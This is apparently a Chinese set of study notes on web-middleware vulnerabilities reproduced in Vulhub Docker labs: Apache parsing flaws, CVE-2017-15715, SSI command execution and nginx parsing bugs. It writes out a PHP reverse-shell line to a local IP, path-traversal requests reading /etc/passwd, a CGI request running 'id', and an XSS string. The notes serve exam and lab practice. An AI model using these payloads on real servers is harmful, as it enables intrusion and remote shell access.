PTE-中间件安全

DOCKER环境,一般是80 8080 8081端口

1 apache位置扩展名解析漏洞

复制代码
cd vulhub-master/httpd/apache_parsing_vulnerability/
docker-compose up -d

修改一句话的后缀 直接上传

蚁剑

2 CVE-2017-15715

复制代码
docker-compose stop
cd ..
cd CVE-2017-15715/
docker-compose up -d

在提交的时候抓包

在文件名后加+ 然后到HEX下把对应的2b改成0a, 放过去

直接访问不行,因为$匹配OA 注意这里0A要大写

能过黑名单,不能过白名单

3 SSI远程命令执行漏洞(服务器端包含)

复制代码
docker-compose stop
cd ..
cd ssi-rce
docker-compose up -d

开ssi-rce

写shtml

直接上传

点击访问

需要查什么可以通过修改命令

但是再docker1中

4 nginx解析漏洞 过白名单

5 nginx文件名逻辑漏洞 过白名单

上传时抓包 文件名后加空格

正常访问不到,和视频不一样

6 可以反向shell <?php system("bash -c 'bash -i &>/dev/tcp/192.168.100.137/10086 0>&1'");?>

上传也要加空格,同上,访问也一样

访问前开监听,访问后可以连到服务器

6

%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1

Host: 192.168.100.131:8080

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT

If-None-Match: "2d-432a5e4a73a80"

Cache-Control: max-age=0

Content-Length: 7

echo;id

GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

<script>alert('xss')</script>

相关推荐
xixixi7777714 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
hz5678917 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung517 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
卓豪终端管理19 小时前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
技术不好的崎鸣同学21 小时前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
GEO_youxuan1 天前
2026年儿童电话手表推荐:定位精度、通话安全与健康监测深度横评
安全
数据知道1 天前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
doiito1 天前
【安全,架构】RustyVault 项目深度分析报告以及和HashiCorp Vault的差异
后端·安全·rust
2601_962851741 天前
计算机毕业设计之基于SSM的网络安全课程资源分享平台
vue.js·算法·安全·web安全·yolo·目标检测·课程设计
ylscode1 天前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全